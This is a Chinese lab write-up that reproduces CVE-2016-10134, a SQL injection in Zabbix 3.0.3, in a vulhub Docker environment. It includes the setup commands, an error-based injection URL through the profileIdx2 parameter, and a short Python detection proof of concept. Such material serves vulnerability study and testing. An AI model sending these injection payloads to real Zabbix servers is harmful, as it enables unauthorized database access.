环境搭建:
使用vulhub,进入对应文件夹启动环境:
[root@localhost CVE-2016-10134]# cd /home/vulhub/zabbix/CVE-2016-10134/
[root@localhost CVE-2016-10134]# docker-compose up -d
查看端口(从下面的输出可见,web 容器映射到宿主机的 0.0.0.0:8080,即对宿主机所有网卡开放,建议只在隔离的实验网络中运行):
[root@localhost CVE-2016-10134]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
186d17fe3db4 vulhub/zabbix:3.0.3-server "/docker-entrypoint.…" 37 seconds ago Up 35 seconds (health: starting) 162/udp, 10051/tcp cve-2016-10134_agent_1
61dac6a6b384 vulhub/zabbix:3.0.3-web "/docker-entrypoint.…" 37 seconds ago Up 35 seconds (healthy) 0.0.0.0:8080->80/tcp, :::8080->80/tcp cve-2016-10134_web_1
00cf5df981b0 mysql:5 "docker-entrypoint.s…" 39 seconds ago Up 38 seconds 3306/tcp, 33060/tcp cve-2016-10134_mysql_1
[root@localhost CVE-2016-10134]#
漏洞复现:
访问以下地址。profileIdx2 参数中的 updatexml() 会使 MySQL 报错,若返回页面的报错信息中回显了 user() 的结果(当前数据库用户),即说明该参数存在 SQL 注入:
http://192.168.10.10:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0,user()),0)
POC编写:
import requests
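# Detection check for CVE-2016-10134 against the vulhub lab instance at
# 192.168.10.10:8080. Requires the third-party `requests` package.
url = "http://192.168.10.10:8080/"
# profileIdx2 carries an updatexml() expression; on a vulnerable instance the
# database error text echoes md5('wwwq'). A fixed marker makes a match
# unambiguous.
poc = "jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0,md5('wwwq')),0)"
# Bound the wait so an unreachable lab host cannot hang the script.
res = requests.get(url + poc, timeout=10)
# Marker: leading characters of md5('wwwq') as given in the write-up. It is
# 26 hex characters, shorter than a full 32-character digest, presumably
# because the error message truncates the echoed value (TODO confirm).
# A missing marker is not proof that the instance is patched: the response
# could equally be an error page, a redirect or a filtered request.
if "afece6b64dc8eff8b9bd078a5f" in res.text:
    print("CVE-2016-10134 存在")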
pycharm运行结果: